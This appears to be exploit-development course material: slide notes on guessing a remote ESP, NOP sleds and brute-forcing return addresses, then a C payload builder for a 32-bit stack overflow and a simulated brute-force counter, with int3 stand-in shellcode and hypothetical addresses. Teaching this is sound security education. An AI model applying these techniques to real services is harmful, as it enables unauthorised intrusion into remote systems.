•Usually you cannot read ESP on the remote system (no debugger there), so the return address has to be estimated
–Make an educated guess: compile and debug a copy, then try the guess remotely (environment size and argv shift the stack a little, so allow for a NOP sled)
–If the daemon is part of a binary package (rpm or deb, for example), debug your own copy of that exact package first
–Brute force it (ugly and noisy: each wrong guess usually crashes the daemon, which is logged and may trigger a restart)
•If you have the source code, compile it yourself (with the -ggdb option set for better debugging)
–Try to compile it with the same options as the rpm or deb you wish to exploit; that way values such as ESP and the proper size of the payload match the target
–Test against the actual rpm or deb package until you get it right
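The two things the slides say you must get right locally are the distance from the buffer to the saved return address (the "proper size of the payload") and a usable ESP guess, with brute force as the fallback. The following C is an added example, not code from the original slides: a payload builder for a classic 32-bit x86 stack overflow and a simulated brute-force loop that counts how many guesses (that is, crashes) a given sled size and step need. The shellcode is a constructed stand-in of int3 bytes, and all addresses and the 512-byte distance are hypothetical values of the kind you would read off a local gdb session.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90  /* x86 one-byte NOP */

/* Constructed stand-in for shellcode: four int3 breakpoints (0xCC).
 * A real payload would put actual shellcode here; the layout logic is the same. */
static const uint8_t kShellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Build a classic x86 stack-overflow payload:
 *   [NOP sled][shellcode][return address x ret_copies]
 * dist_to_ret is the distance from the start of the vulnerable buffer to the
 * saved return address, measured in gdb on a local copy built with the same
 * options as the target package. ret_addr is the guessed ESP (or any address
 * inside the sled), written little-endian as a 32-bit value.
 * Returns the payload length, or 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t out_cap, size_t dist_to_ret,
                     uint32_t ret_addr, size_t ret_copies)
{
    if (dist_to_ret < sizeof kShellcode || ret_copies == 0)
        return 0;
    size_t total = dist_to_ret + 4 * ret_copies;
    if (total > out_cap)
        return 0;

    size_t sled_len = dist_to_ret - sizeof kShellcode;
    memset(out, NOP, sled_len);                            /* NOP sled */
    memcpy(out + sled_len, kShellcode, sizeof kShellcode); /* shellcode */
    for (size_t i = 0; i < ret_copies; i++) {              /* overwrite saved EIP */
        uint8_t *p = out + dist_to_ret + 4 * i;
        p[0] = (uint8_t)(ret_addr);
        p[1] = (uint8_t)(ret_addr >> 8);
        p[2] = (uint8_t)(ret_addr >> 16);
        p[3] = (uint8_t)(ret_addr >> 24);
    }
    return total;
}

/* Inspection helper: build the payload into a static buffer and return the
 * byte at index, or -1 if the build failed or index is past the end. */
int payload_byte_at(size_t dist_to_ret, uint32_t ret_addr, size_t ret_copies,
                    size_t index)
{
    static uint8_t buf[1024];
    size_t n = build_payload(buf, sizeof buf, dist_to_ret, ret_addr, ret_copies);
    if (n == 0 || index >= n)
        return -1;
    return buf[index];
}

/* True if a guessed return address lands inside [sled_start, sled_start + sled_len). */
int guess_hits(uint32_t guess, uint32_t sled_start, uint32_t sled_len)
{
    return guess >= sled_start && (uint64_t)guess < (uint64_t)sled_start + sled_len;
}

/* Simulated brute force: walk guesses from start to end in increments of step
 * and return the 1-based attempt number of the first guess that hits the sled,
 * or 0 if the range is exhausted. Each miss in real life is one crashed daemon
 * and one log entry, which is why the slides call this ugly and noisy.
 * Choosing step <= sled_len guarantees a hit if the sled lies in the range. */
int brute_force_attempts(uint32_t start, uint32_t end, uint32_t step,
                         uint32_t sled_start, uint32_t sled_len)
{
    int attempts = 0;
    if (step == 0)
        return 0;
    for (uint64_t g = start; g <= end; g += step) {
        attempts++;
        if (guess_hits((uint32_t)g, sled_start, sled_len))
            return attempts;
    }
    return 0;
}

int main(void)
{
    uint8_t payload[1024];
    /* Hypothetical numbers: 512 bytes to the saved EIP and an ESP guess of
     * 0xbffff5a0 taken from a local debugging session. */
    size_t n = build_payload(payload, sizeof payload, 512, 0xbffff5a0u, 4);
    printf("payload: %zu bytes, ret at offset 512: %02x %02x %02x %02x\n",
           n, payload[512], payload[513], payload[514], payload[515]);

    /* Sled of 508 bytes; stepping by the sled length means no guess skips it. */
    int tries = brute_force_attempts(0xbfff0000u, 0xbfffffffu, 508, 0xbfff5000u, 508);
    printf("brute force needs %d attempts (crashes) to land in the sled\n", tries);
    return 0;
}
```

The two numbers to take from a run are the sled length and the step: a step larger than the sled can walk straight past it and never hit, while a step equal to the sled length covers a 64 KB stack window in a bit over a hundred crashes, each of which the target's logs will show.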